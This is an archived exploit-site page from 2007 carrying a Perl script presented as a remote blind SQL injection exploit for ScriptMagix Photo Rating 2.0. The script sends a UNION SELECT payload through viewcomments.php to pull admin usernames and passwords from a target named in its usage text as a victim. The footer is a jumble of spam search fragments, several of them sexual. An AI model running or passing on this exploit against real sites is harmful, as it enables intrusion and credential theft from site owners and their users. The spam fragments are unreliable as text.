about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , ScriptMagix Photo Rating <= 2.0 Remote SQL Injection Exploit




2007-03-18 ScriptMagix Photo Rating <= 2.0 Remote SQL Injection Exploit
Rated as : Moderate Risk

#!/usr/bin/perl
#[Script Name: ScriptMagix Photo Rating <= 2.0 (viewcomments.php)
Remote Blind SQL Injection Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Contact    : :(
#[S.Page     : http://www.scriptmagix.com
#[$$         : 75$
#[..         : ajann,Turkey

use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[//   ScriptMagix Photo Rating <= 2.0 (viewcomments.php) Remote Blind
SQL Injection Exploit
[//                   Usage: exploit.pl [target]
[//                   Example: exploit.pl victim.com
[//                   Example: exploit.pl victim.com
[//                           Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/viewcomments.php?phid=";

print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);

if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}

if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
 }


$target =
"-1%20union%20select%200,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),2,3,0,0%20from%20admin/*";
$target = $host.$dir.$file.$target;

#Writing data to socket
print
"+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr
=> "$server", PeerPort => "$port") || die
"\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}

if ($answer =~ /password:(.*?)<\/td>/){
print "+ Password: $1\n";
}

if ($answer =~ /Syntax error/) { 
print "+ Exploit Failed : ( \n";
print
"+**********************************************************************+\n";
exit(); 
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : (  \n";
print
"+**********************************************************************+\n";
exit(); 
}
 }

securitydot.net - 2007-03-18

Advertising

Copyright 2007, SecurityDot
Mon, 09 Nov 2009 10:13:37 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
indiansexy Sex.video. six movy Sex vidio accragirls www.ycw919 fiter shek orbithyip WWW.SXE.CO SEX18 sexo video www.17pk.c 0315ren.co rs gallery XP remote puki ashwariya www.3hhj.c Www.thrish Sex.co.in juniper te www.ftvdre gaybeef MICROSOFT similar wo hardcorese sex CMS is Fr. Www.Ash.Se SREXY linux 2.6. www.jennas sex for nokia 6233 ERETDHT securityDo Www.man fu www.jnpkw. oldgirls hotel heir www.it22.c http:/ourm Video sex HOT PHOTO www.ImegSe module=My_ ping of de earthsongo arebiansex wwwbangbro